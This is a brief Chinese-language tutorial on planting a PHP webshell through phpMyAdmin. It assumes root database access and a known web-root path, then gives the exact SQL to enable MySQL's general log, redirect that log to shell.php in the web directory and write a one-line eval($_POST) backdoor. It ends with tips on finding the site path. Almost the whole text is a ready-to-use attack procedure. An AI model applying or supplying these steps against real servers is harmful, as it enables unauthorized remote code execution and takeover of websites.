前提
1.可登录phpmyadmin
2.root权限
3.知道网站绝对路径
步骤
1.查看日志是否开启
show variables like ‘%general%‘;
2.开启日志记录
SET GLOBAL general_log=‘on‘;
3.修复日志文件路径
set global general_log_file=‘D:\\phpStudy\\WWW\\shell.php‘;
4.写入webshell
select "<?php eval($_POST[‘gg‘]);?>";
网站路径判断
如果是Windows,判断是不是phpStudy集成环境,可通过mysql的位置尝试定位网站位置(使用sql语句定位mysql位置:select @@datadir;)
如果是Linux,一般实在/var/www/html路径下